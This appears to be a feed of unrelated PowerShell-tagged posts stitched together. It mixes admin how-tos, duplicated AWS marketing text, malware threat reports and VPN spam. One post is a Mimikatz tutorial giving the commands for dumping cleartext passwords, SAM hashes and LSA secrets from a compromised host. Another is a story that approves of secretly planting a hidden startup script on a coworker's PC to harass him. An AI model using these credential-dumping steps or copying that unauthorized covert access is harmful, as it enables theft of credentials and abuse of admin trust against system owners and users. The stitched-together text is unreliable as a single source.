Enter-PSsession: Run PowerShell Remote Commands

Enter-PSsession: Run PowerShell Remote Commands @vexpert #vmwarecommunities #100daysofhomelab #homelab #PowerShellRemotingBasics #EnterPSSessionCommands #PowerShellRemoteServer #RemoteSystemManagement #WindowsServerPowerShell #NewPSSessionUsage

Windows PowerShell has changed how we manage our Windows Server environments. One of the powerful features of PowerShell is PowerShell remoting, which enables the execution of PowerShell commands or scripts on a remote computer. The Enter-PSSession command, a core part of PowerShell remoting, allows us to establish an interactive session with a remote system, fundamentally changing how we…

View On WordPress

Gaining Windows Credentialed Access Using Mimikatz and WCE

Prerequisites & Requirements

In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:

Kali Linux

Parrot OS

The following is a list of recommended technical prerequisites that you will need in order to get the most out of this course:

Familiarity with Linux system administration.

Familiarity with Windows.

Functional knowledge of TCP/IP.

Familiarity with penetration testing concepts and life-cycle.

Note: The techniques and tools utilized in this document were performed on Kali Linux 2021.2 Virtual Machine

MITRE ATT&CK Credential Access Techniques

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include: keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

The techniques outlined under the Credential Access tactic provide us with a clear and methodical way of extracting credentials and hashes from memory on a target system.

The following is a list of key techniques and sub techniques that we will be exploring:

Dumping SAM Database.

Extracting clear-text passwords and NTLM hashes from memory.

Dumping LSA Secrets

Scenario

Our objective is to extract credentials and hashes from memory on the target system after we have obtained an initial foothold. In this case, we will be taking a look at how to extract credentials and hashes with Mimikatz.

Note: We will be taking a look at how to use Mimikatz with Empire, however, the same techniques can also be replicated with meterpreter or other listeners as the Mimikatz syntax is universal.

Meterpreter is a Metasploit payload that provides attackers with an interactive shell that can be used to run commands, navigate the filesystem, and download or upload files to and from the target system.

Credential Access With Mimikatz

Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.

The SAM (Security Account Manager) database, is a database file on Windows systems that stores user’s passwords and can be used to authenticate users both locally and remotely. 

The Mimikatz codebase is located at https://github.com/gentilkiwi/mimikatz/, and there is also an expanded wiki at https://github.com/gentilkiwi/mimikatz/wiki . 

In order to extract cleartext passwords and hashes from memory on a target system, we will need an Empire agent with elevated privileges.

Extracting Cleartext Passwords & Hashes From Memory

Empire uses an adapted version of PowerSploit’s Invoke-Mimikatz function written by Joseph Bialek to execute Mimikatz functionality in PowerShell without touching disk.

PowerSploit is a collection of PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 

Empire can take advantage of nearly all Mimikatz functionality through PowerSploit’s Invoke-Mimikatz module.

We can invoke the Mimikatz prompt on the target agent by following the procedures outlined below.

The first step in the process involves interacting with your high integrity agent, this can be done by running the following command in the Empire client:

interact <AGENT-ID>/<NAME>

The next step is to Invoke Mimikatz on the Agent shell, this can be done by running the following command:

mimikatz

This will invoke Mimikatz on the target system and you should be able to interact with the Mimikatz prompt.

Before we take a look at how to dump cleartext credentials from memory with Mimikatz, you should confirm that you have the required privileges to take advantage of the various Mimikaz features, this can be done by running the following command in the Mimikatz prompt:

mimikatz # privilege::debug

If you have the correct privileges you should receive the message “Privilege ‘20’ OK” as shown in the following screenshot.

We can now extract cleartext passwords from memory with Mimikatz by running the following command in the Mimikatz prompt:

mimikatz # sekurlsa::logonpasswords

If successful, Mimikatz will output a list of cleartext passwords for user accounts and service accounts as shown in the following screenshot.

In this scenario, we were able to obtain the cleartext password for the Administrator user as well as the NTLM hash.

NTLM is the default hash format used by Windows to store passwords.

Dumping SAM Database

We can also dump the contents of the SAM (Security Account Manager) database with Mimikatz, this process will also require an Agent with administrative privileges.

The Security Account Manager (SAM) is a database file used on modern Windows systems and is used to store user account passwords. It can be used to authenticate local and remote users. 

We can dump the contents of the SAM database on the target system by running the following command in the Mimikatz prompt:

mimikatz # lsadump::sam

If successful Mimikatz will output the contents of the SAM database as shown in the following screenshot.

As highlighted in the previous screenshot, the SAM database contains the user accounts and their respective NTLM hashes.

LSA Secrets

Mimikatz also has the ability to dump LSA Secrets, LSA secrets is a storage location used by the Local Security Authority (LSA) on Windows.

You can learn more about LSA and how it works here: https://networkencyclopedia.com/local-security-authority-lsa/

The purpose of the Local Security Authority is to manage a system’s local security policy, as a result, it will typically store data pertaining to user accounts such as user logins, authentication of users, and their LSA secrets, among other things. It is to be noted that this technique also requires an Agent with elevated privileges.

We can dump LSA Secrets on the target system by running the following command in the Mimikatz prompt:

mimikatz # lsadump::secrets

If successful Mimikatz will output the LSA Secrets on the target system as shown in the following screenshot.

So far, we have been able to extract both cleartext credentials as well as NTLM hashes for all the user and service accounts on the system. These credentials and hashes will come in handy when we will be exploring lateral movement techniques and how we can legitimately authenticate with the target system with the credentials and hashes we have been able to extract.

I'm having to train a replacement at my IT job (I told them I was leaving before he was hired, and they asked nicely) and genuinely it makes me afraid.

Long story below the break

I'm a software engineering major. I understand I probably have a significantly higher technical knowledge of a lot of things than most people ever should (nobody who isn't getting paid for it should have to deal with windows powershell). And not in an XKCD "most people only know a few command line commands" way but as in "I worked the front lines helping 70 year old professors who never used a computer in their life before covid forced them to teach remotely setup zoom". I am intimately familiar with how little most people know about computers.

But you see, I do have what I consider a basic knowledge that I expect someone to know if they're in tech. Fellow IT workers and programmers just need to know these things to do our jobs effectively.

So, when the guy I'm training searches "Google" on his browser's address bar, clicks on the google link on the google search page, and then pastes the URL he had copied to his clipboard INTO THE GOOGLE SEARCH instead of, ya know, using a web browser normally. I get concerned.

Because, see, it's not even that he's a business or horticulture or any unrelated major who's working IT just to pay for college. Happens all the time with student positions, and we're more than happy to help these guys learn more about tech and help send some more power users into their fields.

No, he is a software engineering major. Just a year behind me. I know what courses he's taken, because I've taken them. He should know better. He's not a bad programmer either, I've seen some of his work. He has written websites from scratch. But cannot navegate a web browser to save his life.

And I realized in that moment, that singular moment, why all those 100 level courses I took that I hated because I fell asleep in them, why they were inportant. Because this knowledge, at least in my university, just isn't being passed down. "Intro to Computing" taught him what a mouse and keyboard are, why a monutor is useful, and gave him a basic cursory glance at the different parts of a PC internally.

But nobody explained to him what a URL is. Or what different parts of a web browser actually do. They jumped straight into code, giving him hardlinks to follow and step by step guides to set everything up, without really explainung what he was doing or why until his dev environment is setup and he's writing code. He can use keyboard shortcuts and command lines like the rest of em. But he doesn't know what the Chrome address bar is, that it's connected directly to google anyways, or that he can put URL's into it to get to websites directly.

Im terrified. That it's even remotely possible that someone who is paid to be giving tech advice to others at a major institution can be missing these key skills.

To be clear, I don't think we're in danger of losing important fundamental tech knowledge yet. There's good learning resources out there and people who are working to expand this knowledge and preserve it. And we should share them with more people. My grandmother enjoyed showing her yarnworking group how to use a pattern database website she'd found, and they're all deepy entrenched in new fun projects using patterns they found on Ravelry.com

But knowing who to trust for information on the internet is crucial for your own and other's safety. And the fact that someone hoping to go into working on the very fabric that underpins the information superhighway doesn't know how to change lanes or read a map? Means who we trust when asking tech questions is even more important, especially with the rising prevelance of "AI" information, which is just wrong. The machine we built to guess how to end sentences makes up lies. Wow. I can't believe my phone autocorrect we trained on stolen books and almost every wrod ever written on the internet without anyone's consent doesn't correctly write a program to pilot a rocket.

Im rambling now. But maybe if you do know what I'm talking about, reach out to someone who could benefit from a little more computer knowledge and show them in a fun way how a web browser works. We all benefit from increased computer literacy.

this can't be true can it

Discover AWS Systems Manager Cross-Account Management

What is AWS Systems Manager?

AWS Systems Manager is a solution that facilitates the management, viewing, and control of your infrastructure in multicloud, on-premises, and AWS settings.

AWS Systems Manager’s advantages

Boost visibility throughout your whole node infrastructure

A consolidated view of all the nodes across the accounts and regions of your company is offered by AWS Systems Manager. Get node information quickly, including its name, ID, installed agents, operating system information, and tags. You may find problems and act more quickly by using Amazon Q Developer to query node metadata in natural language.

Use automation to increase operational efficiency

Reduce the time and effort needed to maintain your systems by automating routine operational chores. Systems Manager eliminates the need for remote PowerShell, SSH, or bastion hosts by enabling you to safely and securely manage your nodes at scale without logging into your servers. It offers a straightforward method for automating routine operational tasks, like software and patch installations, registry modifications, and user administration, across groups of nodes.

Make node management easier at scale in any setting

Any AWS, on-premises, or multicloud environment can run the Systems Manager Agent (SSM Agent), enabling Systems Manager to offer out-of-the-box visibility and simplifying managed node maintenance. Set up diagnostics to run automatically in order to find problems with the SSM Agent. Issues with pre-defined runbooks can then be fixed. Once under control, nodes can efficiently carry out vital operational functions including remotely executing commands, starting logged sessions, and patching nodes with security updates.

Tools

You can use the entire suite of AWS Systems Manager tools to securely connect to nodes without managing bastion hosts or SSH keys, patch nodes with security updates, automate operational commands at scale, and obtain thorough fleet visibility once your nodes are managed by Systems Manager.

Use cases

Control every node you have

Gain thorough insight into your hybrid and multicloud systems, as well as your node infrastructure across Amazon Web Services accounts and regions. Rapidly detect and resolve agent problems to restore unmanaged nodes and efficiently carry out crucial operational duties, such applying security updates to nodes, starting and recording sessions, or executing operational commands.

Automate your processes

Make your computational resources available, configure them, and deploy them automatically. To address common problems like misconfigured agents, keep infrastructure up to date with SSM Agent diagnosis and remediation. Execute essential operational activities, like automatically applying fixes for applications and operating systems on a regular basis.

Increase the effectiveness of operations

Prioritize increasing operational effectiveness, cutting expenses, and growing your company. Across your hybrid and multicloud setups, AWS Systems Manager is your enterprise-grade solution for managing nodes at scale with cross-account and cross-region visibility.

Presenting a fresh AWS Systems Manager experience

AWS is presenting an enhanced version of AWS Systems Manager today, which offers the much-desired cross-account and cross-region experience for large-scale node management.

All of your managed nodes, including different kinds of infrastructure like Amazon Elastic Compute Cloud (EC2) instances, containers, virtual machines on other cloud providers, on-premise servers, and edge Internet of Things (IoT) devices, can be seen centrally with the new System Manager experience. When they are linked to Systems Manager and have the Systems Manager Agent (SSM Agent) installed, they are called “managed nodes.”

A node is referred to be a “unmanaged node” if an SSM Agent ceases operating on it for any reason, at which point Systems Manager no longer has access to it. The latest version of Systems Manager also makes it easier to find and troubleshoot unmanaged nodes. To resolve any problems and restore connectivity so they can once more be managed nodes, you may run and even schedule an automated diagnosis that gives you suggested runbooks to follow.

Amazon Q Developer, the most powerful generative AI-powered software development helper, has also been integrated with Systems Manager. Using natural language, you may ask Amazon Q Developer questions about the nodes you’ve handled. You’ll receive quick answers and links to the Systems Manager where you can take action or carry out more research.

With the new interface with Systems Manager in this edition, you can also leverage AWS Organizations to enable a delegated administrator to centrally manage nodes throughout the business.

AWS Systems Manager pricing

You can monitor and fix operational problems with all of your AWS applications and resources, including Amazon Elastic Compute Cloud (EC2), Amazon Relational Database Service (RDS), Amazon Elastic Container Service (ECS), and Amazon Elastic Kubernetes Service (EKS) instances, as well as in multicloud and hybrid environments, using the unified user interface that AWS Systems Manager offers. With AWS Systems Manager, you may begin using the benefits of the AWS Free Tier without paying a dime. No upfront obligations or minimum costs apply. There may be restrictions.

AWS Free Tier

The following functionalities of AWS Systems Manager are available to you for free as part of the AWS Free Tier. There may be restrictions.

Explorer

Enabling Explorer does not incur any further fees. There may be restrictions.

The dashboard of Explorer is populated by paid OpsCenter APIs (GetOpsSummary). These API queries will incur fees. The Export to CSV option uses an aws:executeScript action step to run an Automation document. The cost of these actions may be determined by Automation pricing.

For more details please visit the AWS systems manager pricing page.

In conclusion

Gaining visibility and control over your computing infrastructure and carrying out operational tasks at scale need the use of Systems Manager. Through a centralized dashboard, the new experience provides a centralized view of all your nodes across AWS accounts, on-premises, and multicloud environments. It also integrates Amazon Q Developer for natural language queries and allows one-click SSM Agent troubleshooting. By going to the Systems Manager panel and following the simple steps, you may activate the new experience without paying more.

What is AWS Systems Manager?

AWS Systems Manager is a solution that facilitates the management, viewing, and control of your infrastructure in multicloud, on-premises, and AWS settings.

AWS Systems Manager’s advantages

Boost visibility throughout your whole node infrastructure

A consolidated view of all the nodes across the accounts and regions of your company is offered by AWS Systems Manager. Get node information quickly, including its name, ID, installed agents, operating system information, and tags. You may find problems and act more quickly by using Amazon Q Developer to query node metadata in natural language.

Use automation to increase operational efficiency

Reduce the time and effort needed to maintain your systems by automating routine operational chores. Systems Manager eliminates the need for remote PowerShell, SSH, or bastion hosts by enabling you to safely and securely manage your nodes at scale without logging into your servers. It offers a straightforward method for automating routine operational tasks, like software and patch installations, registry modifications, and user administration, across groups of nodes.

Make node management easier at scale in any setting

Any AWS, on-premises, or multicloud environment can run the Systems Manager Agent (SSM Agent), enabling Systems Manager to offer out-of-the-box visibility and simplifying managed node maintenance. Set up diagnostics to run automatically in order to find problems with the SSM Agent. Issues with pre-defined runbooks can then be fixed. Once under control, nodes can efficiently carry out vital operational functions including remotely executing commands, starting logged sessions, and patching nodes with security updates.

Tools

You can use the entire suite of AWS Systems Manager tools to securely connect to nodes without managing bastion hosts or SSH keys, patch nodes with security updates, automate operational commands at scale, and obtain thorough fleet visibility once your nodes are managed by Systems Manager.

Use cases

Control every node you have

Gain thorough insight into your hybrid and multicloud systems, as well as your node infrastructure across Amazon Web Services accounts and regions. Rapidly detect and resolve agent problems to restore unmanaged nodes and efficiently carry out crucial operational duties, such applying security updates to nodes, starting and recording sessions, or executing operational commands.

Automate your processes

Make your computational resources available, configure them, and deploy them automatically. To address common problems like misconfigured agents, keep infrastructure up to date with SSM Agent diagnosis and remediation. Execute essential operational activities, like automatically applying fixes for applications and operating systems on a regular basis.

Increase the effectiveness of operations

Prioritize increasing operational effectiveness, cutting expenses, and growing your company. Across your hybrid and multicloud setups, AWS Systems Manager is your enterprise-grade solution for managing nodes at scale with cross-account and cross-region visibility.

Presenting a fresh AWS Systems Manager experience

AWS is presenting an enhanced version of AWS Systems Manager today, which offers the much-desired cross-account and cross-region experience for large-scale node management.

All of your managed nodes, including different kinds of infrastructure like Amazon Elastic Compute Cloud (EC2) instances, containers, virtual machines on other cloud providers, on-premise servers, and edge Internet of Things (IoT) devices, can be seen centrally with the new System Manager experience. When they are linked to Systems Manager and have the Systems Manager Agent (SSM Agent) installed, they are called “managed nodes.”

A node is referred to be a “unmanaged node” if an SSM Agent ceases operating on it for any reason, at which point Systems Manager no longer has access to it. The latest version of Systems Manager also makes it easier to find and troubleshoot unmanaged nodes. To resolve any problems and restore connectivity so they can once more be managed nodes, you may run and even schedule an automated diagnosis that gives you suggested runbooks to follow.

Amazon Q Developer, the most powerful generative AI-powered software development helper, has also been integrated with Systems Manager. Using natural language, you may ask Amazon Q Developer questions about the nodes you’ve handled. You’ll receive quick answers and links to the Systems Manager where you can take action or carry out more research.

With the new interface with Systems Manager in this edition, you can also leverage AWS Organizations to enable a delegated administrator to centrally manage nodes throughout the business.

AWS Systems Manager pricing

You can monitor and fix operational problems with all of your AWS applications and resources, including Amazon Elastic Compute Cloud (EC2), Amazon Relational Database Service (RDS), Amazon Elastic Container Service (ECS), and Amazon Elastic Kubernetes Service (EKS) instances, as well as in multicloud and hybrid environments, using the unified user interface that AWS Systems Manager offers. With AWS Systems Manager, you may begin using the benefits of the AWS Free Tier without paying a dime. No upfront obligations or minimum costs apply. There may be restrictions.

AWS Free Tier

The following functionalities of AWS Systems Manager are available to you for free as part of the AWS Free Tier. There may be restrictions.

Explorer

Enabling Explorer does not incur any further fees. There may be restrictions.

The dashboard of Explorer is populated by paid OpsCenter APIs (GetOpsSummary). These API queries will incur fees. The Export to CSV option uses an aws:executeScript action step to run an Automation document. The cost of these actions may be determined by Automation pricing.

For more details please visit the AWS systems manager pricing page.

In conclusion

Gaining visibility and control over your computing infrastructure and carrying out operational tasks at scale need the use of Systems Manager. Through a centralized dashboard, the new experience provides a centralized view of all your nodes across AWS accounts, on-premises, and multicloud environments. It also integrates Amazon Q Developer for natural language queries and allows one-click SSM Agent troubleshooting. By going to the Systems Manager panel and following the simple steps, you may activate the new experience without paying more.

Read more on govindhtech.com

What The Shell?: Part 1| TryHackMe

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines. Task 1 What is a shell? shells are what we use when interfacing with a Command Line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and Powershell on Windows. When targeting remote systems it is sometimes possible to force an…

Living Up to my Persona

I make a big thing about being a spirit of chaos bottled up in failing human meat, but the thing is, operating in civil society means keeping your limiters and blinkers on, so to speak. I don't exactly get to go ham on the occasional dealership's bigots or douchebags, but when I do...

See, Walt's the verbal type. Sarah's the snippy one when it comes to defending the polycule and me? Well, I know I'd fold in two with a stiff breeze. I can't punch up to save my life, my meatware decides that stammering is extra cool when it comes to actually giving lip to someone when I'm not hiding behind a headset - so I attack the best way I can: using tech to do my dirty work.

A few weeks into our company's existence, I'm doing in-person work at a dealership whose staff I utterly loathe for how contemptuous they are for their own client base and for all external collaborators (the constructor's name obviously ends with a "Benz"), and one of the Sales reps lands just one too many biphobic and discriminatory comments concerning my disability. So, using SSH, I term into his desktop while working on their central database, and drop the following into a custom BAT file I hide in the depths of Windows' System32 folder:

(at)echo off

:: Generate a random number between 1 and 100

set /a X=%random% * 100 / 32768 + 1

:: Use PowerShell to display a message box with the random number

powershell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Hey, Mike! Looks like you did %X% pushups today! Nice job!', 'Pushup Tracker')"

exit

A few more keystrokes in Windows' Run program gets me access to the Startup folder (God bless Admin rights) and I set my BAT file to run with every Windows boot-up sequence. Mike, in this case, knows as much about Windows' architecture as your average fruit fly.

He will never find my little gift, and will drive their own swamped and chronically non-available Level 1 tech absolutely fucking bugnuts, as per later testimonies. As, after all, it's just a Batch file - not a virus. From their end of things, everything is copacetic.

Fast-forward a few months, and being hounded by a mocking Windows message window seems to be enough for Mike to go from a self-obsessed would-be Sigma to a snivelling little runt who puffs up in front of customers but who realizes he's entirely dependent on us to meet his Sales targets...

And Walt knows I like it like that. I smile, nod, wave off Mike's earlier homophobia - but if I wanted? I could access that BAT file and make it much, much more malicious.

I might remove it remotely in a few months. It's been long enough as it is - but I want to be sure. Wouldn't want Mikey to get an excessive surge of homophobic self-confidence again...

APT41 Targets Taiwanese Government Research Institute with ShadowPad and Cobalt Strike

Cisco Talos researchers have reported a significant cyber attack on a Taiwanese government-affiliated research institute, attributing the breach to the China-linked group APT41 with medium confidence. The campaign began as early as July 2023 and involved deploying advanced malware tools including ShadowPad and Cobalt Strike. Attack Overview and Attribution The researchers identified several key aspects of the attack: - The campaign targeted a Taiwanese government-affiliated research institute - APT41, a group allegedly comprised of Chinese nationals, is believed to be responsible - Attribution is based on overlaps in tactics, techniques, and procedures (TTPs), infrastructure, and malware families exclusive to Chinese APT groups ShadowPad Malware Deployment A central component of the attack was the use of ShadowPad, a sophisticated modular remote access trojan (RAT): - ShadowPad is known to be sold exclusively to Chinese hacking groups - The malware exploited an outdated vulnerable version of Microsoft Office IME binary as a loader - A customized second-stage loader was used to launch the payload - Two distinct iterations of ShadowPad were encountered during the investigation Cobalt Strike and Custom Loaders The attackers also leveraged Cobalt Strike and developed custom loaders to evade detection: - A unique Cobalt Strike loader written in GoLang was used to bypass Windows Defender - The loader was derived from an anti-AV tool called CS-Avoid-Killing, found on GitHub - Simplified Chinese file and directory paths suggest the attackers' proficiency in the language - PowerShell commands were used to execute scripts for running ShadowPad directly in memory and fetching Cobalt Strike from command and control (C2) servers

The Github repository of Cobalt Strike loader. Exploitation of CVE-2018-0824 APT41 demonstrated advanced capabilities by exploiting a known vulnerability: - The group created a custom loader to inject a proof-of-concept for CVE-2018-0824 directly into memory - This remote code execution vulnerability was used to achieve local privilege escalation - A tool called UnmarshalPwn was employed in the exploitation process Attack Methodology and Persistence The attackers employed various techniques to maintain access and avoid detection: - Three hosts in the targeted environment were compromised - Documents were exfiltrated from the network - A web shell was used to maintain persistence and drop additional payloads - The "quser" command was executed to monitor for other logged-on users, allowing the attackers to pause activities if detected - After deploying backdoors, the web shell and guest account used for initial access were deleted Broader Implications and Ongoing Investigations Cisco Talos researchers emphasized the potential for further discoveries: - Analysis of artifacts from this campaign led to the identification of samples and infrastructure potentially used in different campaigns - Sharing these findings could help the cybersecurity community make connections and enhance ongoing investigations - Indicators of Compromise (IoCs) for this campaign have been released on Cisco Talos' GitHub repository This sophisticated cyber attack on a Taiwanese government research institute highlights the ongoing threat posed by advanced persistent threat (APT) groups like APT41. Complex malware such as ShadowPad, combined with custom loaders and exploitation of known vulnerabilities, demonstrates the evolving tactics employed by state-sponsored threat actors. Read the full article

MacOS Users Beware! The HZ RAT Spy Software Targeting DingTalk and WeChat Exposed

With the rapid development of information technology, network security issues are becoming increasingly prominent. Especially malicious software attacks targeting enterprise-level communication tools are gradually becoming new security challenges. Recently, Kaspersky Lab released a report revealing that a new type of malicious software called HZ RAT is launching large-scale espionage activities against DingTalk and WeChat users on the MacOS platform. This news quickly attracted high attention from the industry.

HZ RAT is a backdoor malicious software initially discovered by the German cybersecurity company DCSO in November 2022. This malicious software is mainly spread through self-extracting zip files or malicious RTF documents. The latter exploits a vulnerability (CVE-2017-11882) that has existed in Microsoft Office for many years. In addition to the traditional Windows platform, the developers of HZ RAT clearly have not ignored the growth potential of the MacOS user group. They have specially designed a version suitable for the MacOS system, enabling this malicious software to run rampant on different operating systems.

According to the discovery of Kaspersky researcher Sergey Puzan, the functions of the HZ RAT MacOS version are similar to those of the Windows version. The difference lies in that it relies on receiving instructions through shell scripts issued by a remote server. This means that whether it is a Windows or MacOS user, once infected with HZ RAT, the attacker can easily remotely control the victim device through the Command and Control (C2) server. HZ RAT can perform a series of dangerous operations, including but not limited to executing PowerShell commands, writing arbitrary files, uploading files to the server, and regularly sending heartbeat information to confirm the status of the target device. These functions make HZ RAT very suitable for stealing credentials and conducting system reconnaissance.

It is worth noting that one of the spreading methods of the HZ RAT MacOS version is to disguise itself as an installation package of a legitimate application, such as OpenVPN Connect. When a user installs this disguised software, the malicious software will establish a connection with the C2 server and start to perform its malicious tasks. Worryingly, HZ RAT can not only extract sensitive information such as WeChat ID, email address, and phone number from DingTalk and WeChat but also obtain more information about the user's organization.

The emergence of the HZ RAT MacOS version indicates that the previous attackers are still active and are constantly evolving their attack methods. Although the main goal of these malicious software currently seems to be to collect user data, considering its lateral movement capabilities, future threats may become more complex and dangerous.

At the same time, this espionage activity targeting MacOS users has once again triggered trust issues about network security products. Looking back at history, the U.S. government once included the products of the Russian cybersecurity giant Kaspersky Lab on the banned sales list due to national security considerations. Now, similar concerns seem to be surrounding Chinese cybersecurity companies. At the beginning of 2024, the U.S. Department of Commerce announced that it added the Chinese cybersecurity enterprise Knownsec to its entity list, restricting its business activities in the U.S. market. This measure is undoubtedly another impact on the global cybersecurity landscape. It not only affects the international business of related enterprises but also triggers extensive discussions about technological autonomy and information security guarantees.

Whether it is the continuous threat of HZ RAT or the frictions generated by international technological competition, they are all reminding us of the importance of network security and the complex situation it faces. In the face of evolving network threats, enterprises and individuals should be more vigilant and strengthen their self-protection awareness. At the same time, governments and enterprises of all countries also need to strengthen cooperation to jointly build a more solid network defense line to ensure the security and stability of the information age.

Enable WinRM on Windows Servers and Windows PCs

In this article, we shall discuss how to enable WinRM on Windows Servers and Windows PCs. Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers. PowerShell remoting is similar to SSH used in accessing remote computers. Please see how to…

How to Set Time Zone Using PowerShell: A Step-by-Step Guide

When managing a Remote Desktop Protocol (RDP) server, ensuring that the time zone is correctly set is crucial for maintaining synchronization and avoiding time-related issues. Whether you’re using a free RDP server or have decided to buy RDP services, this guide will walk you through the process of setting the time zone using PowerShell. Follow these steps to ensure your Windows RDP environment is accurately configured.

Understanding the Importance of Setting the Correct Time Zone

Preparing Your Windows RDP Server

Before you begin, make sure you have administrative access to the Windows RDP server. PowerShell is a powerful tool that requires appropriate permissions to make system changes. Whether you’re using a free RDP server or a paid one, administrative rights are a prerequisite for the steps outlined below.

Step-by-Step Guide to Setting the Time Zone Using PowerShell

Step 1: Open PowerShell

First, log into your Windows RDP server. If you’re using an RDP client, connect to your server using the appropriate credentials. Once logged in, open PowerShell with administrative privileges. You can do this by searching for PowerShell in the start menu, right-clicking on it, and selecting “Run as administrator”.

Step 2: Check the Current Time Zone

Before making any changes, it’s a good idea to check the current time zone setting on your RDP server. Use the following command in PowerShell:powershellCopy codeGet-TimeZone

This command will display the current time zone configured on your Windows RDP server. This is especially useful if you’re troubleshooting time zone-related issues on a free RDP server or one that you recently bought.

Step 3: List Available Time Zones

This command will output a list of all time zones that your Windows RDP server supports. Review this list to find the appropriate time zone for your needs. Whether you’re managing a free RDP server or a commercial one, this list is comprehensive and covers all possible configurations.

Step 4: Set the Desired Time Zone

Once you have identified the correct time zone, you can set it using the Set-TimeZone cmdlet. For example, if you want to set the time zone to "Pacific Standard Time", use the following command:powershellCopy codeSet-TimeZone -Name "Pacific Standard Time"

Ensure that you replace “Pacific Standard Time” with the exact name of the time zone you want to set, as listed by the Get-TimeZone -ListAvailable command. This step is the same regardless of whether you're configuring a free RDP server or one you've opted to buy RDP access for.

Step 5: Verify the Change

After setting the new time zone, it’s important to verify that the change has been applied correctly. Use the Get-TimeZone command again to check the current time zone:powershellCopy codeGet-TimeZone

This confirmation step ensures that your Windows RDP server is now operating in the correct time zone. It’s a quick and effective way to double-check your work, whether you’re managing a free RDP server or a purchased one.

Troubleshooting Common Issues

Even though setting the time zone on your Windows RDP server is generally straightforward, you might encounter some issues. Here are a few common problems and how to solve them:

Insufficient Permissions: Ensure you are running PowerShell as an administrator. Without administrative privileges, you won’t be able to change the time zone.

Incorrect Time Zone Name: If you receive an error stating the time zone name is incorrect, double-check the list provided by the Get-TimeZone -ListAvailable command to ensure you have the correct name.

Sync Issues: After setting the time zone, if you still face synchronization issues, check other related settings such as the system clock and time synchronization settings on your RDP server.

Conclusion

Setting the time zone on your Windows RDP server using PowerShell is an essential task for maintaining accurate timekeeping and ensuring the smooth operation of your server environment. Whether you’re managing a free RDP server or a paid service, the steps outlined in this guide will help you configure the time zone correctly. By following this step-by-step guide, you can ensure that your RDP server is always running at the correct time, providing a better experience for all users.

PowerShell Kill a Process from the Command Line

PowerShell Kill a Process from the Command Line #homelab #PowerShellProcessManagement #TerminatingProcessesInWindows #UsingTaskkillCommand #PowerShellVsCommandPrompt #AutomateKillingProcesses #PowerShellForceTermination #ManagingRemoteServerProcesses

Killing processes in Windows has long been the easiest way to deal with unresponsive programs that won’t close using the usual means by clicking the “X” in the top right-hand corner. Generally speaking, using the Windows Task Manager is the first method most use to find and close processes that are not responding. However, using the command line, we can leverage command prompt commands and…

View On WordPress

Day 11 at BCS

More work on the powershell script good progress figured out remote command execution and filtering the certs. Was also processing the phishing and spam for the day for the first time.

does gpupdate work over vpn

🔒🌍✨ Get 3 Months FREE VPN - Secure & Private Internet Access Worldwide! Click Here ✨🌍🔒

does gpupdate work over vpn

GPUpdate command VPN functionality

The 'GPUpdate' command in a VPN (Virtual Private Network) environment plays a crucial role in ensuring that the client computers receive the latest Group Policy settings from the domain controller. When a VPN connection is established, it is important that all client machines are kept up to date with the latest policies to maintain security and compliance standards.

By utilizing the 'GPUpdate' command, network administrators can manually trigger a refresh of the Group Policy settings on a client machine, ensuring that any recent changes or updates are applied promptly. This command proves to be particularly useful in VPN scenarios where clients may not always be connected to the corporate network to receive automatic updates.

To execute the 'GPUpdate' command in a VPN environment, users typically open the Command Prompt window and enter the command along with the necessary parameters. This initiates a request to the domain controller to retrieve the latest Group Policy settings, including security policies, software deployment schedules, and other configurations specified by the network administrator.

Overall, the 'GPUpdate' command serves as a valuable tool for maintaining network security and ensuring consistency across client machines in a VPN setup. By proactively running this command, organizations can mitigate potential security risks and issues arising from outdated or conflicting Group Policy settings, ultimately enhancing the overall security posture of the network.

GPUpdate command remote access

The GPUpdate command is a powerful tool used in the Windows operating system for updating Group Policy settings on a local or remote computer. With the GPUpdate command, system administrators can ensure that any changes made to Group Policy Objects (GPOs) are applied immediately without the need for a system reboot.

One of the key features of the GPUpdate command is its ability to be executed remotely, allowing administrators to update Group Policy settings on multiple computers from a central location. This remote access capability streamlines the process of managing Group Policy settings across an entire network, saving time and effort for IT professionals.

To use the GPUpdate command remotely, administrators can utilize tools such as PowerShell or Remote Desktop to connect to the target computer and execute the command. By running GPUpdate remotely, administrators can ensure that all computers on the network receive the latest Group Policy settings promptly, maintaining consistency and security across the organization.

It is important to note that the GPUpdate command should be used with caution, as applying incorrect Group Policy settings can have unintended consequences on system behavior. Administrators should always test changes in a controlled environment before deploying them to production systems to avoid potential disruptions.

In conclusion, the GPUpdate command's remote access functionality provides system administrators with a convenient and efficient way to update Group Policy settings across multiple computers in a network. By leveraging this powerful tool, IT professionals can streamline the management of Group Policy Objects and ensure that all systems remain secure and compliant with organizational policies.

GPUpdate not working VPN connection

If you're encountering issues with GPUpdate not functioning properly while connected to a VPN, several factors could be at play. GPUpdate, or Group Policy Update, is a crucial tool in Windows environments for applying group policies across networks. When it fails to work over a VPN connection, troubleshooting becomes essential.

Firstly, verify your VPN connection stability. Fluctuating or unreliable connections can disrupt the communication between your device and the domain controller, leading to GPUpdate failures. Try reconnecting to the VPN or switching to a more stable network if possible.

Secondly, check if the VPN firewall or security settings are blocking the necessary communication ports for GPUpdate. Ensure that the required ports (such as TCP port 445 for SMB communication) are open and accessible through the VPN connection.

Additionally, consider the DNS resolution settings. GPUpdate relies on proper DNS resolution to locate domain controllers and apply group policies. If DNS resolution is not functioning correctly over the VPN, GPUpdate may fail. Ensure that your VPN settings are configured to use the correct DNS servers provided by your network administrator.

Furthermore, investigate any potential conflicts between the VPN client software and Group Policy settings. Certain VPN configurations or client software may interfere with the execution of GPUpdate. Adjusting VPN settings or policies to exclude conflicts with Group Policy operations can help resolve this issue.

